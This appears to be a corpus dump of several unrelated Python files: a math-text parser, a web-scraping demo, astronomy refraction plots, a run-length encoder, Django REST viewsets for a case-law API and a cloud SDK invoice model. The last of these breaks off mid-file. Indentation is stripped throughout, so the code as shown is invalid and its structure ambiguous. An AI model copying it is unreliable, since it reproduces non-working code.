return (
Pattern._var() + Pattern.controlseq_pattern() + Pattern._var()
).treat(f,'binary_controlseq_pattern')
def identifier_pattern():
def f(acc):
return Etok('identifier_pattern',etoks=acc,raw=acc)
return first(
(identifier() + args_template()) ,
(c.next_type('BLANK').treat(Etok.etok) + args_template())
).treat(f)
def precedence_level(): #was paren_precedence_level
"""parser for the precedence level.
output: (INTEGER,ASSOC), where ASSOC in ['left','right','no'].
integer conversion is not performed.
>>> pstream(Pattern.precedence_level(),'with precedence 10 and left associativity ...')
Etok(precedence_level,'with precedence 10 and left associativity')
"""
def f(acc):
(_,((_,i),a),_) =acc
if a:
((_,a),_)=a
return Etok('precedence_level',etoks=(i,a),raw=acc)
return c.opt_paren(
(next_phrase('with precedence') + c.next_type('INTEGER').treat(Etok.etok)) +
(next_word('and') + read_keyword('assoc').treat(Etok.etok) + next_word('associativity')).possibly()
).treat(f,'precedence_level')
def get_precedence_level(e):
"""helper function that computes the precedence of Etok e
as integer,assoc"""
(i,a)=e.etoks
i = int(i)
if not(a):
return (i,'no')
return (i,c.getvalue(a))
def any_symbol(): # was symbol
return first(
c.next_type('SYMBOL').treat(Etok.etok) ,
Pattern.controlseq_pattern()
)
def symbol(s): # was the_symbol
return c.next_type('SYMBOL').if_value(s).treat(Etok.etok)
def symbol_pattern():
"""Parser for general symbol pattern. Alternating S/V.
At least one symbol appears, but possibly no variables.
V? S (VS)* V? where V=var, S=symbol.
The symbols can occupy either even or add positions.
>>> pstream(Pattern.symbol_pattern(),'x ## y ## z')
Etok(symbol_pattern,'x ## y ## z')
>>> pstream(Pattern.symbol_pattern(),'x ## y ## z with precedence 5')
Etok(symbol_pattern,'x ## y ## z with precedence 5')
"""
def f(acc):
((((v1,s1),vs),v2),p)=acc
vs = [s1]+vs
if v1:
vs = [v1]+vs
if v2:
vs = vs + [v2]
return Etok('symbol_pattern',etoks=(vs,p),raw=acc)
return (
Pattern._var().possibly() + Pattern.any_symbol() +
(Pattern._var() + Pattern.any_symbol()).many() +
Pattern._var().possibly() + Pattern.precedence_level().possibly()
).treat(f,'symbol_pattern')
def binary_symbol_pattern():
"""Parser for binary symbol pattern.
VSV (V=var, S=symbol)
Special case of symbol_pattern.
>>> pstream(Pattern.binary_symbol_pattern(),'x ^^ y with precedence 10 and right associativity')
Etok(binary_symbol_pattern,'x ^^ y with precedence 10 and right associativity')
>>> pstream(Pattern.binary_symbol_pattern(),'x ## y')
Etok(binary_symbol_pattern,'x ## y')
"""
def f(acc):
((v,s),v2)=acc
return Etok('binary_symbol_pattern',etoks=(v,s,v2),raw=acc)
return (
Pattern._var() + Pattern.any_symbol() + Pattern._var() +
Pattern.precedence_level().possibly()
).treat(f,'binary_symbol_pattern')
class Macro:
def in_section():
"""Parser for in-section scoping.
>>> pstream(Macro.in_section(),'In this section,')
Etok(in_section,'in this section ,')
Output:
Etok whose value is the location keyword.
"""
def f(acc):
((_,d),_)=acc
return Etok(name='in_section',etoks=[d],raw=acc)
return (next_phrase('in this') + read_keyword('doc') +
comma.possibly()).treat(f,'in_section')
#def we_record_def_deprecated():
# """Parser for registered facts.
def copula():
"""Parser for copula in macro declarations.
>>> pstream(Macro.copula(),'is defined as')
Etok(copula,'is defined as')
"""
def f(acc):
return Etok('copula',etoks=[],raw=acc)
return first(
(lit('is') + lit('defined_as').possibly()) ,
(next_value(':=')) ,
(lit('denote'))
).treat(f,'copula')
def function_copula():
"""Parser for function_copula with possible type annotation
>>> pstream(Macro.function_copula(),': POST_COLON_TYPE := ...')
Etok(function_copula,': POST_COLON_TYPE :=')
"""
def f2(acc):
(o,_)=acc
return Etok(name='function_copula',etoks=[o],raw=acc)
return first(
Macro.copula() ,
(opt_colon_type() + next_value(':=')).treat(f2,'function_copula')
)
def iff_junction():
return lit('iff')
def opt_say():
"""
>>> pstream(Macro.opt_say(),'We say')
Etok(LIT,we-say,'we say')
"""
return lit('we-say').possibly()
#def opt_record_deprecated():
# return lit('we-record').possibly()
def opt_define():
"""
>>> pstream(Macro.opt_define(),'Let us define ...')
Etok(opt_define,'let us define')
"""
def f(acc):
return Etok('opt_define',etoks=[],raw=acc)
return (
(lit('lets') + next_word('define').possibly()) # |
#Macro.opt_record()
).treat(f,'opt_define')
#def macro_inferring():
def classifier_word_pattern(): # was classifier_words
def f(acc):
return Etok(name='classifier_word_pattern',etoks=acc[0::2],raw=acc)
return (
c.plus_andcomma(c.next_any_word_except(['is','are','be']).treat(Etok.etok))
).treat(f,'classifier_word_pattern')
def classifier_def():
"""Parser for defining classifiers.
profile: ('classifier_word_pattern' 'WORD'*)
>>> pstream(Macro.classifier_def(),'Let function, symbol, object be classifiers')
Etok(classifier_word_pattern,'let function , symbol , object be classifier')
"""
def f(acc):
((((_,w),_),_),_)=acc
return Etok.rawupdate(w,acc)
return (
next_word('let') + Macro.classifier_word_pattern() +
lit('is') + lit('a').possibly() + next_word('classifier')
).treat(f,'classifier_def')
def type_head():
"""
Parser for the LHS pattern of a type def.
The symbol pattern has fixed precedence, right assoc
"""
return first(
Pattern.symbol_pattern() ,
Pattern.type_word_pattern() ,
Pattern.identifier_pattern() ,
Pattern.controlseq_pattern()
)
def type_def():
"""
Parser for a type definition.
>>> pstream(Macro.type_def(),'We define x ## y : Type to be TIGHTEST_TYPE')
Etok(type_def,'we define x ## y : type to be TIGHTEST_TYPE')
>>> pstream(Macro.type_def(),'We define x ## y to be the type TIGHTEST_TYPE')
Etok(type_def,'we define x ## y to be the type TIGHTEST_TYPE')
"""
def f1(acc):
((((((_,h),_),_),_),_),t)=acc
return Etok('type_def',etoks=(h,t),raw=acc)
def f2(acc):
((((_,h),_),_),t)=acc
return Etok('type_def',etoks=(h,t),raw=acc)
"""Parser for a type definition"""
return first(
(Macro.opt_define() + Macro.type_head() + colon + rawtype +
Macro.copula() + lit('a').possibly() + general_type()).treat(f1,'type_def') ,
(Macro.opt_define() + Macro.type_head() + Macro.copula() +
c.next_phrase('the type') + general_type()).treat(f2,'type_def')
)
def function_head():
"""
Parser for the LHS pattern of a function def.
"""
return first(
Pattern.function_word_pattern() ,
Pattern.symbol_pattern() ,
Pattern.identifier_pattern()
)
def function_def():
"""
Parser for function definitions.
>>> pstream(Macro.function_def(),'We define x ## y := the PRIM_DEFINITE_NOUN')
Etok(function_def,'we define x ## y := the PRIM_DEFINITE_NOUN')
"""
def f(acc):
#return acc
(((((_,h),_),_),p))=acc
return Etok('function_def',etoks=(h,p),raw=acc)
return (
Macro.opt_define() + Macro.function_head() +
Macro.function_copula() + lit('equal').possibly() +
#next_word('the').possibly() + N.B. plain_definite_noun includes 'the' already
plain_term()
).treat(f,'function_def')
def predicate_head():
"""Parser for the LHS pattern of a predicate def"""
return first(
Pattern.identifier_pattern() , #before word pattern
Pattern.predicate_word_pattern() ,
Pattern.symbol_pattern()
)
def predicate_def():
"""Parser for predicate definitions
>>> pstream(Macro.predicate_def(),'We write x >> y iff it is wrong that STATEMENT')
Etok(predicate_def,'we write x >> y iff it is wrong that STATEMENT')
"""
def f(acc):
(((_,h),_),s)=acc
return Etok('predicate_def',etoks=(h,s),raw=acc)
return (
Macro.opt_say() + Macro.predicate_head() +
Macro.iff_junction() + statement()
).treat(f,'predicate_def')
def binder_def():
"""Parser for definition of new binders (quantifiers)
>>> pstream(Macro.binder_def(),'Let the binder ## (x : POST_COLON_TYPE), P denote it is wrong that STATEMENT ')
Etok(binder_def,'let the binder ## ( x : POST_COLON_TYPE ) , P denote it is wrong that STATEMENT')
"""
def f(acc):
((((((_,s),(_,(v,t),_)),_),v2),_),p)=acc
return Etok('binder_def',etoks=(s,v,t,v2,p),raw=acc)
return (
next_phrase('let the binder') + Pattern.any_symbol() +
c.paren(var() + opt_colon_type()) +
comma + var() +
lit('denote') + statement()
).treat(f,'binder_def')
def definition_statement():
"""Parser for classifier, type, function, predicate defs
"""
return first(
Macro.classifier_def() ,
Macro.type_def() ,
Macro.function_def() ,
Macro.predicate_def()
)
def definition_affirm():
"""Definition + period"""
def f(acc):
(d,_)=acc
return Etok.rawupdate(d,acc)
return (Macro.definition_statement() + period).treat(f,'definition_affirm')
def definition_label():
"""
>>> pstream (Macro.definition_label(),'Definition XX.')
Etok(definition_label,'definition XX .')
"""
def f(acc):
((_,l),_) = acc
return Etok(name='definition_label',etoks=l,raw=acc)
return (lit('def') + label().possibly() + period).treat(f,'definition_label')
def definition():
"""
Main parser for definitions.
Disambiguation:
predicates use iff_junction.
identifier patterns start with an identifier.
predicate word patterns contains words
binary symbol patterns contain start with tvar then a symbol.
Functions use the copula.
word patterns starts with LIT_THE word ...
symbol patterns contain a symbol or CONTROLSEQ.
identifier patterns start with an identifier.
Types use the copula.
type_def from function_def distinguished by COLON ID_TYPE
before the copula.
>>> pstream(Macro.definition(),'Definition XX. We say x >> y iff it is wrong that STATEMENT.')
Etok(definition,'definition XX . we say x >> y iff it is wrong that STATEMENT .')
"""
def f(acc):
((p,a),d)=acc
return Etok('definition',etoks=(p,a,d),raw=acc)
return (
Macro.definition_label() + assumption().many() +
Macro.definition_affirm()
).treat(f,'definition')
def macro_body():
"""Parser for macro classifier, type, function def,
let annotation, etc."""
return first(
Macro.classifier_def() ,
Macro.type_def() ,
Macro.function_def() ,
Macro.predicate_def() ,
let_annotation() ,
Macro.binder_def()
# record_def
# enter_namespace
)
def macro():
"""A macros are like definitions, but they
can have local scope, they can be chained,
they include binder defs and let annotations,
and they does not have a label.
Macros are expanded immediately, but definitions
create a new constant and are not expanded.
The expansion of a macro must be a plain_term,
but a definition may contain bound variables.
>>> pstream(Macro.macro(),'In this section, we write x << y iff it is wrong that STATEMENT.')
Etok(macro,'in this section , we write x << y iff it is wrong that STATEMENT .')
"""
sep = semicolon + next_word('and').possibly()
def f(acc):
((s,b),_)=acc
return Etok('macro',etoks=(s,b[0::2]),raw=acc)
return (
Macro.in_section().possibly() +
Macro.macro_body().plus(sep) + period
).treat(f,'macro')
@memo
def declaration():
"""Parser for axiom, definition, or theorem
"""
return first(
theorem() ,
axiom() ,
Macro.definition()
)
@memo
def utterance():
"""A text item is a major block of texts
in a document.
Every item must end with a period or be an
instruction in [].
"""
return first(
section_label() ,
# not implemented. namespace() ,
Instruction.instruction() ,
synonym_item() ,
declaration() ,
Macro.macro() ,
inductive_decl() ,
mutual_inductive_decl_item() ,
mutual_inductive_def_item() ,
satisfy_item()
)
@memo
def text():
"""Parse a sequence of utterance
Normally, we work at the level of utterances,
processing each in turn, before moving to the next.
The text Parser skips the processing.
"""
return utterance().many() + lit('done').possibly()
@memo
def program_text():
return text() + Parse.finished()
# initialize lookup tables
def _add_prim1():
def equal():
return next_value('=').treat(Etok.etok)
add_lookup_parse('prim_binary_relation_op',equal())
def bool():
return (rawtrue | rawfalse)
add_lookup_parse('prim_relation', bool().name('prim_relation','True-False'))
pass
_add_prim1()
lookup = {
'affirm_proof':affirm_proof,
'alt_term': alt_term,
'binder_prop': binder_prop,
'delimited_term':delimited_term,
'does_pred':does_pred,
'general_type':general_type,
'head_statement':head_statement,
'is_pred':is_pred,
'opentail_term':opentail_term,
'plain_term':plain_term,
'post_colon_type':post_colon_type,
'proof_script':proof_script,
'prop':prop,
'pseudoterm':pseudoterm,
'sort_expr':sort_expr,
'statement':statement,
'tdop_term':tdop_term,
'term':term,
'tightest_expr':tightest_expr,
'word_pattern':Pattern.word_pattern,
}
def _init_lookup_parse():
for s in {}:
add_lookup_parse(s,c.lazy_call(lookup[s]))
_init_lookup_parse()
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE)
| 2.765625 | 3 |
exeSemana5.py | SricardoSdSouza/Curso-da-USP | 0 | 12759609 | ''''
def multiplica(a,b):
return a*b
print(multiplica(4,5))
def troca(x,y):
aux = x
x=y
y=aux
x=10
y=20
troca(x,y)
print("X=",x,"e y =",y)
'''
def total_caracteres (x,y,z):
return (len(x)+len(y)+len(z))
| 3.453125 | 3 |
scraping.py | Pragati-02/Web-Scraping | 0 | 12759610 | <reponame>Pragati-02/Web-Scraping<gh_stars>0
import requests
from bs4 import BeautifulSoup
r = requests.get("https://pythonizing.github.io/data/example.html", headers={'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0'})
c = r.content
# print (c)
soup = BeautifulSoup(c, "html.parser")
# print(soup.prettify())
div_content = soup.find_all("div", {"class":"cities"})
# print(div_content[0])
# print(div_content[2])
h2_text = div_content[0].find_all("h2")[0].text
# print(h2_text)
for item in div_content:
print(item.find_all("h2")[0].text)
for item in div_content:
print(item.find_all("p")[0].text)
| 3.453125 | 3 |
kai/reduce/test_dar.py | skterry/KAI | 1 | 12759611 | from pyraf import iraf
import glob, os
import numpy as np
import pylab as py
import math, datetime
import pyfits
from gcwork import objects
from . import dar
def diffDarOnOff(cleanDir1, cleanDir2):
files1tmp = glob.glob(cleanDir1 + '/c????.fits')
files2tmp = glob.glob(cleanDir2 + '/c????.fits')
for f1 in files1tmp:
cname1 = f1.split('/')[-1]
for f2 in files2tmp:
cname2 = f2.split('/')[-1]
if (cname1 == cname2):
outname = cname1.replace('c', 'diff')
print('IMARITH: %s - %s = %s' % (cname1, cname2, outname))
if (os.path.exists(outname)):
iraf.imdelete(outname)
iraf.imarith(f1, '-', f2, outname)
def plotScalePosangOverNight(alignRoot, imgDir):
# Read in the list of images used in the alignment
listFile = open(alignRoot+'.list', 'r')
parang = []
for line in listFile:
_data = line.split()
lisFile = _data[0].split('/')[-1]
if (lisFile.startswith('mag')):
continue
fitsFile = imgDir + lisFile.split('_')[0] + '.fits'
# Get header info
hdr = pyfits.getheader( fitsFile )
parang.append( hdr['PARANG'] )
parang = np.array(parang)
numEpochs = len(parang)
# Load scales/angles
scale = np.zeros(numEpochs, float)
angle = np.zeros(numEpochs, float)
sgrax = np.zeros(numEpochs, float)
sgray = np.zeros(numEpochs, float)
scaleErr = np.zeros(numEpochs, float)
angleErr = np.zeros(numEpochs, float)
sgraxErr = np.zeros(numEpochs, float)
sgrayErr = np.zeros(numEpochs, float)
imgPA = np.zeros(numEpochs, float)
for e in range(numEpochs):
trans = objects.Transform()
trans.loadFromAbsolute(root='./', align=alignRoot + '.trans', idx=e+1)
trans.linearToSpherical(silent=1, override=False)
scale[e] = trans.scale
angle[e] = math.degrees(trans.angle)
scale *= 9.96
py.clf()
py.subplot(2, 1, 1)
py.plot(parang, scale, 'k.')
py.ylabel('Plate Scale (mas/pix)')
py.xlabel('Parallactic Angle (deg)')
py.title('Relative Transformation')
py.subplot(2, 1, 2)
py.plot(parang, angle, 'k.')
py.ylabel('Position Angle (deg)')
py.xlabel('Parallactic Angle (deg)')
py.savefig('plots/scale_pa_vs_parang.png')
def plotDarCoeffsVsZenith():
effWave = 2.12 # microns
utc = datetime.datetime(2008, 6, 15, 0, 0, 0)
utc2hst = datetime.timedelta(hours=-10)
hst = utc + utc2hst
(refA, refB) = dar.keckDARcoeffs(effWave, hst.year, hst.month, hst.day,
hst.hour, hst.minute)
elevation = np.arange(30.0, 90.0, 1.0)
tanz = np.tan((90.0 - elevation) * math.pi / 180.0)
tmp = 1.0 + tanz**2
darCoeffL = tmp * (refA + 3.0 * refB * tanz**2)
darCoeffQ = -tmp * (refA*tanz +
3.0 * refB * (tanz + 2.0*tanz**3))
# Convert DAR coefficients for use with arcseconds
darCoeffL *= 1.0
darCoeffQ *= 1.0 / 206265.0
# 1" sep
linear1 = darCoeffL * 1.0 * 10**3 # in mas
quadra1 = darCoeffQ * 1.0**2 * 10**3 # in mas
# 10" sep
linear2 = darCoeffL * 10.0 * 10**3 # in mas
quadra2 = darCoeffQ * 10.0**2 * 10**3 # in mas
# 60" sep
linear3 = darCoeffL * 60.0 * 10**3 # in mas
quadra3 = darCoeffQ * 60.0**2 * 10**3 # in mas
print(' Linear(mas) Quardatic(mas)')
print('1" sep %12.7f %12.7f' % (linear1.mean(), quadra1.mean()))
print('10" sep %12.7f %12.7f' % (linear2.mean(), quadra2.mean()))
print('60" sep %12.7f %12.7f' % (linear3.mean(), quadra3.mean()))
py.clf()
py.semilogy(elevation, linear1, 'r-')
py.semilogy(elevation, -quadra1, 'r--')
py.semilogy(elevation, linear2, 'b-')
py.semilogy(elevation, -quadra2, 'b--')
py.semilogy(elevation, linear3, 'g-')
py.semilogy(elevation, -quadra3, 'g--')
py.legend(('1" lin', '1" quad',
'10" lin', '10" quad', '60" lin', '60" quad'), loc='lower left')
py.xlabel('Elevation (deg)')
py.ylabel('Delta-R (mas)')
py.savefig('dar_linear_vs_quad_terms.png')
py.savefig('dar_linear_vs_quad_terms.eps')
| 2.109375 | 2 |
assignments/solutions/11_run_length/rle.py | zchen1-ua/be434-fall-2021 | 0 | 12759612 | #!/usr/bin/env python3
def encode(message):
encoded_message = ""
i = 0
while (i <= len(message) - 1):
count = 1
ch = message[i]
j = i
while (j < len(message) - 1):
if (message[j] == message[j + 1]):
count = count + 1
j = j + 1
else:
break
encoded_message = encoded_message + str(count) + ch
i = j + 1
return encoded_message
#Provide different values for message and test your program
encoded_message = encode("ABBBBCCCCCCCCAB")
print(encoded_message)
| 3.78125 | 4 |
capstone/capapi/views/api_views.py | jcushman/capstone | 0 | 12759613 | import re
import urllib
from collections import OrderedDict
from django.http import HttpResponseRedirect, FileResponse
from django.utils.text import slugify
from rest_framework import viewsets, renderers, mixins
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework.reverse import reverse
from capapi.middleware import add_cache_header
from capdb import models
from capapi import serializers, filters, permissions, pagination
from capapi import renderers as capapi_renderers
from capdb.models import Citation
from django_elasticsearch_dsl_drf.constants import (
LOOKUP_FILTER_RANGE,
LOOKUP_QUERY_IN,
LOOKUP_QUERY_GT,
LOOKUP_QUERY_GTE,
LOOKUP_QUERY_LT,
LOOKUP_QUERY_LTE,
)
from django_elasticsearch_dsl_drf.filter_backends import (
FilteringFilterBackend,
IdsFilterBackend,
OrderingFilterBackend,
DefaultOrderingFilterBackend,
SearchFilterBackend,
)
from django_elasticsearch_dsl_drf.viewsets import BaseDocumentViewSet
from django_elasticsearch_dsl_drf.pagination import PageNumberPagination
from capapi.documents import CaseDocument
from capapi.serializers import CaseDocumentSerializer
class BaseViewSet(viewsets.ReadOnlyModelViewSet):
http_method_names = ['get']
class JurisdictionViewSet(BaseViewSet):
serializer_class = serializers.JurisdictionSerializer
filterset_class = filters.JurisdictionFilter
queryset = models.Jurisdiction.objects.order_by('name', 'pk')
lookup_field = 'slug'
class VolumeViewSet(BaseViewSet):
serializer_class = serializers.VolumeSerializer
queryset = models.VolumeMetadata.objects.order_by('pk').select_related(
'reporter'
).prefetch_related('reporter__jurisdictions')
class ReporterViewSet(BaseViewSet):
serializer_class = serializers.ReporterSerializer
filterset_class = filters.ReporterFilter
queryset = models.Reporter.objects.order_by('full_name', 'pk').prefetch_related('jurisdictions')
class CourtViewSet(BaseViewSet):
serializer_class = serializers.CourtSerializer
filterset_class = filters.CourtFilter
queryset = models.Court.objects.order_by('name', 'pk').select_related('jurisdiction')
lookup_field = 'slug'
class CitationViewSet(BaseViewSet):
serializer_class = serializers.CitationWithCaseSerializer
queryset = models.Citation.objects.order_by('pk')
class CaseViewSet(BaseViewSet):
serializer_class = serializers.CaseSerializer
queryset = models.CaseMetadata.objects.in_scope().select_related(
'volume',
'reporter',
).prefetch_related(
'citations'
).order_by(
'decision_date', 'id' # include id to get consistent ordering for cases with same date
)
renderer_classes = (
renderers.JSONRenderer,
capapi_renderers.BrowsableAPIRenderer,
capapi_renderers.XMLRenderer,
capapi_renderers.HTMLRenderer,
)
filterset_class = filters.CaseFilter
lookup_field = 'id'
def is_full_case_request(self):
return True if self.request.query_params.get('full_case', 'false').lower() == 'true' else False
def get_queryset(self):
if self.is_full_case_request():
return self.queryset.select_related('case_xml', 'body_cache')
else:
return self.queryset
def get_serializer_class(self, *args, **kwargs):
if self.is_full_case_request():
return serializers.CaseSerializerWithCasebody
else:
return self.serializer_class
def list(self, *args, **kwargs):
jur_value = self.request.query_params.get('jurisdiction', None)
jur_slug = slugify(jur_value)
if not jur_value or jur_slug == jur_value:
return super(CaseViewSet, self).list(*args, **kwargs)
query_string = urllib.parse.urlencode(dict(self.request.query_params, jurisdiction=jur_slug), doseq=True)
new_url = reverse('casemetadata-list') + "?" + query_string
return HttpResponseRedirect(new_url)
def retrieve(self, *args, **kwargs):
# for user's convenience, if user gets /cases/casecitation or /cases/Case Citation (or any non-numeric value)
# we redirect to /cases/?cite=casecitation
id = kwargs[self.lookup_field]
if re.search(r'\D', id):
normalized_cite = Citation.normalize_cite(id)
query_string = urllib.parse.urlencode(dict(self.request.query_params, cite=normalized_cite), doseq=True)
new_url = reverse('casemetadata-list') + "?" + query_string
return HttpResponseRedirect(new_url)
return super(CaseViewSet, self).retrieve(*args, **kwargs)
class CaseDocumentViewSet(BaseDocumentViewSet):
"""The CaseDocument view."""
document = CaseDocument
serializer_class = CaseDocumentSerializer
pagination_class = PageNumberPagination
lookup_field = 'id'
filter_backends = [
FilteringFilterBackend,
IdsFilterBackend,
OrderingFilterBackend,
DefaultOrderingFilterBackend,
SearchFilterBackend,
]
# Define search fields
search_fields = (
'case_body__data__text',
'name',
'jurisdiction__name_long',
'court__name',
)
# Define filter fields
filter_fields = {
'id': {
'field': 'id',
# Note, that we limit the lookups of id field in this example,
# to `range`, `in`, `gt`, `gte`, `lt` and `lte` filters.
'lookups': [
LOOKUP_FILTER_RANGE,
LOOKUP_QUERY_IN,
LOOKUP_QUERY_GT,
LOOKUP_QUERY_GTE,
LOOKUP_QUERY_LT,
LOOKUP_QUERY_LTE,
],
},
'name': 'name',
}
# Define ordering fields
ordering_fields = {
'decision_date': 'decision_date',
'name_abbreviation': 'name_abbreviation.raw',
'id': 'id',
}
# Specify default ordering
ordering = ('decision_date', 'name_abbreviation', 'id',)
def is_full_case_request(self):
return True if self.request.query_params.get('full_case', 'false').lower() == 'true' else False
def get_serializer_class(self, *args, **kwargs):
if self.is_full_case_request():
return serializers.CaseDocumentSerializerWithCasebody
else:
return self.serializer_class
class CaseExportViewSet(BaseViewSet):
serializer_class = serializers.CaseExportSerializer
queryset = models.CaseExport.objects.order_by('pk')
filterset_class = filters.CaseExportFilter
def list(self, request, *args, **kwargs):
# mark list requests to filter out superseded downloads by default
self.request.hide_old_by_default = True
return super().list(request, *args, **kwargs)
def filter_queryset(self, queryset):
queryset = super().filter_queryset(queryset)
# filter out superseded downloads for list requests unless with_old=true
try:
if self.request.hide_old_by_default and self.request.GET.get('with_old') != 'true':
queryset = queryset.exclude_old()
except AttributeError:
pass
return queryset
@action(
methods=['get'],
detail=True,
renderer_classes=(capapi_renderers.PassthroughRenderer,),
permission_classes=(permissions.CanDownloadCaseExport,),
)
def download(self, *args, **kwargs):
instance = self.get_object()
# send file
response = FileResponse(instance.file.open(), content_type='application/zip')
response['Content-Length'] = instance.file.size
response['Content-Disposition'] = 'attachment; filename="%s"' % instance.file_name
# public downloads are cacheable
if instance.public:
add_cache_header(response)
return response
class NgramViewSet(mixins.ListModelMixin, viewsets.GenericViewSet):
http_method_names = ['get']
queryset = models.Ngram.objects.order_by('pk').select_related('w1', 'w2', 'w3')
filterset_class = filters.NgramFilter
pagination_class = pagination.SmallCapPagination
renderer_classes = (
renderers.JSONRenderer,
capapi_renderers.NgramBrowsableAPIRenderer,
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# cache translation table between jurisdiction slug and ID
self.jurisdiction_id_to_slug = {v:k for k,v in filters.jurisdiction_slug_to_id.items()}
self.jurisdiction_id_to_slug[None] = 'total'
def list(self, request, *args, **kwargs):
# without specific ngram search, return nothing
q = self.request.GET.get('q', '').strip()
if not q:
return Response({})
# fetch all unique ngrams for query, and paginate
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
# get counts for each ngram
out = OrderedDict()
if page:
# build lookup table
ngrams_by_id = {}
for ngram in page:
out[str(ngram)] = ngrams_by_id[ngram.pk] = {}
# fetch all observations, using same query parameters
observations = models.NgramObservation.objects.filter(ngram__in=page)
obs_filter = filters.NgramObservationFilter(data=request.query_params, queryset=observations, request=request)
if not obs_filter.is_valid():
raise obs_filter.errors
observations = list(obs_filter.qs.values_list('ngram_id', 'jurisdiction_id', 'year', 'instance_count', 'document_count'))
# sort with None values first
observations.sort(key=lambda x: [[y is not None, y] for y in x])
# organize all observations by ngram, then jurisdiction, then year
for ngram_id, jurisdiction_id, year, instance_count, document_count in observations:
jurs = ngrams_by_id[ngram_id]
jurisdiction_slug = self.jurisdiction_id_to_slug[jurisdiction_id]
if jurisdiction_slug not in jurs:
jurs[jurisdiction_slug] = OrderedDict()
years = jurs[jurisdiction_slug]
years[year or "total"] = [instance_count, document_count]
return self.get_paginated_response(out)
| 1.804688 | 2 |
src/oci/osp_gateway/models/invoice_line_summary.py | LaudateCorpus1/oci-python-sdk | 0 | 12759614 | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class InvoiceLineSummary(object):
"""
Product items of the invoice
"""
def __init__(self, **kwargs):
"""
Initializes a new InvoiceLineSummary object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param product:
The value to assign to the product property of this InvoiceLineSummary.
:type product: str
:param order_no:
The value to assign to the order_no property of this InvoiceLineSummary.
:type order_no: str
:param part_number:
The value to assign to the part_number property of this InvoiceLineSummary.
:type part_number: str
:param time_start:
The value to assign to the time_start property of this InvoiceLineSummary.
:type time_start: datetime
:param time_end:
The value to assign to the time_end property of this InvoiceLineSummary.
:type time_end: datetime
:param quantity:
The value to assign to the quantity property of this InvoiceLineSummary.
:type quantity: float
:param net_unit_price:
The value to assign to the net_unit_price property of this InvoiceLineSummary.
:type net_unit_price: float
:param total_price:
The value to assign to the total_price property of this InvoiceLineSummary.
:type total_price: float
:param currency:
The value to assign to the currency property of this InvoiceLineSummary.
:type currency: oci.osp_gateway.models.Currency
"""
self.swagger_types = {
'product': 'str',
'order_no': 'str',
'part_number': 'str',
'time_start': 'datetime',
'time_end': 'datetime',
'quantity': 'float',
'net_unit_price': 'float',
'total_price': 'float',
'currency': 'Currency'
}
self.attribute_map = {
'product': 'product',
'order_no': 'orderNo',
'part_number': 'partNumber',
'time_start': 'timeStart',
'time_end': 'timeEnd',
'quantity': 'quantity',
'net_unit_price': 'netUnitPrice',
'total_price': 'totalPrice',
'currency': 'currency'
}
self._product = None
self._order_no = None
self._part_number = None
self._time_start = None
self._time_end = None
self._quantity = None
self._net_unit_price = None
self._total_price = None
self._currency = None
@property
def product(self):
"""
**[Required]** Gets the product of this InvoiceLineSummary.
Product of the item
:return: The product of this InvoiceLineSummary.
:rtype: str
"""
return self._product
@product.setter
def product(self, product):
"""
Sets the product of this InvoiceLineSummary.
Product of the item
:param product: The product of this InvoiceLineSummary.
:type: str
"""
self._product = product
@property
def order_no(self):
"""
Gets the order_no of this InvoiceLineSummary.
Product of the item
:return: The order_no of this InvoiceLineSummary.
:rtype: str
"""
return self._order_no
@order_no.setter
def order_no(self, order_no):
"""
Sets the order_no of this InvoiceLineSummary.
Product of the item
:param order_no: The order_no of this InvoiceLineSummary.
:type: str
"""
self._order_no = order_no
@property
def part_number(self):
"""
Gets the part_number of this InvoiceLineSummary.
Part number
:return: The part_number of this InvoiceLineSummary.
:rtype: str
"""
return self._part_number
@part_number.setter
def part_number(self, part_number):
"""
Sets the part_number of this InvoiceLineSummary.
Part number
:param part_number: The part_number of this InvoiceLineSummary.
:type: str
"""
self._part_number = part_number
@property
def time_start(self):
"""
Gets the time_start of this InvoiceLineSummary.
Start date
:return: The time_start of this InvoiceLineSummary.
:rtype: datetime
"""
return self._time_start
@time_start.setter
def time_start(self, time_start):
"""
Sets the time_start of this InvoiceLineSummary.
Start date
:param time_start: The time_start of this InvoiceLineSummary.
:type: datetime
"""
self._time_start = time_start
@property
def time_end(self):
"""
Gets the time_end of this InvoiceLineSummary.
End date
:return: The time_end of this InvoiceLineSummary.
:rtype: datetime
"""
return self._time_end
@time_end.setter
def time_end(self, time_end):
"""
Sets the time_end of this InvoiceLineSummary.
End date
:param time_end: The time_end of this InvoiceLineSummary.
:type: datetime
"""
self._time_end = time_end
@property
def quantity(self):
"""
Gets the quantity of this InvoiceLineSummary.
Quantity of the ordered product
:return: The quantity of this InvoiceLineSummary.
:rtype: float
"""
return self._quantity
@quantity.setter
def quantity(self, quantity):
"""
Sets the quantity of this InvoiceLineSummary.
Quantity of the ordered product
:param quantity: The quantity of this InvoiceLineSummary.
:type: float
"""
self._quantity = quantity
@property
def net_unit_price(self):
"""
Gets the net_unit_price of this InvoiceLineSummary.
Unit price of the ordered product
:return: The net_unit_price of this InvoiceLineSummary.
:rtype: float
"""
return self._net_unit_price
@net_unit_price.setter
def net_unit_price(self, net_unit_price):
"""
Sets the net_unit_price of this InvoiceLineSummary.
Unit price of the ordered product
:param net_unit_price: The net_unit_price of this InvoiceLineSummary.
:type: float
"""
self._net_unit_price = net_unit_price
@property
def total_price(self):
"""
Gets the total_price of this InvoiceLineSummary.
Total price of the ordered product (Net unit price x quantity)
:return: The total_price of this InvoiceLineSummary.
:rtype: float
"""
return self._total_price
@total_price.setter
def total_price(self, total_price):
"""
Sets the total_price of this InvoiceLineSummary.
Total price of the ordered product (Net unit price x quantity)
